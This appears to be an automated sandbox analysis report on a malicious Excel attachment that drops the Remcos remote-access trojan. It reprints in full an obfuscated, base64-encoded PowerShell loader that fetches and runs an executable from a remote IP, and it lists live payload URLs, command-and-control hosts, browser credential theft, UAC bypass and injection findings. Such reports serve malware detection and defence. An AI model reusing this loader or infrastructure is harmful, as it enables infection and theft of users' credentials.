            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"
            Source: InstallUtil.exe, 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDD5410 cpuid 11_2_000000013FDD5410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,25_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,25_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,25_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,25_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,25_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,25_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,25_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,25_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,25_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,GetLocaleInfoW,25_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,25_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,25_2_00451F9B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDDDF20 GetSystemTimeAsFileTime,11_2_000000013FDDDF20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041B60D GetUserNameW,25_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,25_2_00449190
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data25_2_0040BA12
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\25_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db25_2_0040BB30

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe25_2_0040569A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Native API            		1
            Scripting            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		23
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts13
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Bypass User Account Control            		21
            Obfuscated Files or Information            		111
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Email Collection            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts121
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Access Token Manipulation            		1
            Install Root Certificate            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares111
            Input Capture            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		1
            Browser Extensions            		1
            Windows Service            		1
            Software Packing            		NTDS3
            File and Directory Discovery            		Distributed Component Object Model4
            Clipboard Data            		2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell            		Network Logon Script322
            Process Injection            		1
            DLL Side-Loading            		LSA Secrets36
            System Information Discovery            		SSHKeylogging122
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Bypass User Account Control            		Cached Domain Credentials121
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading            		DCSync31
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
            Process Injection            		Network Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1482857 Sample: Quotation.xls Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 101 Multi AV Scanner detection for domain / URL 2->101 103 Found malware configuration 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 14 other signatures 2->107 10 EXCEL.EXE 57 39 2->10         started        process3 dnsIp4 69 91.92.245.100, 49164, 49166, 49170 THEZONEBG Bulgaria 10->69 71 tny.wtf 188.114.96.3, 49163, 49165, 49171 CLOUDFLARENETUS European Union 10->71 59 C:\Users\user\Desktop\Quotation.xls (copy), Composite 10->59 dropped 61 C:\Users\user\AppData\Local\...\gdfvr[1].hta, HTML 10->61 dropped 113 Microsoft Office drops suspicious files 10->113 15 mshta.exe 10 10->15         started        19 mshta.exe 10 10->19         started        file5 signatures6 process7 dnsIp8 79 tny.wtf 15->79 83 Suspicious command line found 15->83 85 PowerShell case anomaly found 15->85 21 cmd.exe 15->21         started        81 tny.wtf 19->81 24 cmd.exe 19->24         started        signatures9 process10 signatures11 109 Suspicious powershell command line found 21->109 111 PowerShell case anomaly found 21->111 26 powershell.exe 24 21->26         started        31 powershell.exe 24->31         started        process12 dnsIp13 73 107.173.143.46, 49167, 80 AS-COLOCROSSINGUS United States 26->73 63 C:\Users\user\AppData\Roaming\winiti.exe, PE32+ 26->63 dropped 65 C:\Users\user\AppData\Local\...\csrss[1].exe, PE32+ 26->65 dropped 67 C:\Users\user\AppData\...\ofvwqfjd.cmdline, Unicode 26->67 dropped 115 Installs new ROOT certificates 26->115 117 Powershell drops PE file 26->117 33 winiti.exe 26->33         started        36 csc.exe 2 26->36         started        39 winiti.exe 31->39         started        41 csc.exe 2 31->41         started        file14 signatures15 process16 file17 43 InstallUtil.exe 3 10 33->43         started        55 C:\Users\user\AppData\Local\...\ofvwqfjd.dll, PE32 36->55 dropped 46 cvtres.exe 36->46         started        95 Writes to foreign memory regions 39->95 97 Allocates memory in foreign processes 39->97 99 Injects a PE file into a foreign processes 39->99 48 AddInProcess32.exe 39->48         started        51 MSBuild.exe 39->51         started        57 C:\Users\user\AppData\Local\...\ge3s1wmx.dll, PE32 41->57 dropped 53 cvtres.exe 41->53         started        signatures18 process19 dnsIp20 75 unifrieghtmovers.com 23.95.60.82, 2558, 49168 AS-COLOCROSSINGUS United States 43->75 77 geoplugin.net 178.237.33.50, 49169, 80 ATOM86-ASATOM86NL Netherlands 43->77 87 Contains functionality to bypass UAC (CMSTPLUA) 48->87 89 Contains functionality to steal Chrome passwords or cookies 48->89 91 Contains functionality to register a low level keyboard hook 48->91 93 2 other signatures 48->93 signatures21

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Quotation.xls18%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
            Quotation.xls24%VirustotalBrowse
            Quotation.xls100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe22%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            geoplugin.net1%VirustotalBrowse
            tny.wtf5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://91.92.245.100/up0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax0%Avira URL Cloudsafe
            http://107.173.143.46/T2507F/csrss.exep0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC:0%Avira URL Cloudsafe
            http://107.173.143.46/T2507F/csr0%Avira URL Cloudsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            https://aka.ms/nativeaot-c0%Avira URL Cloudsafe
            http://107.173.143.46/T2507F/csrss.exewerSh0%Avira URL Cloudsafe
            http://107.173.143.46/T2507F/csrss.exep13%VirustotalBrowse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC:5%VirustotalBrowse
            http://107.173.143.46/T2507F/csrss.exed.0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            http://go.micros0%Avira URL Cloudsafe
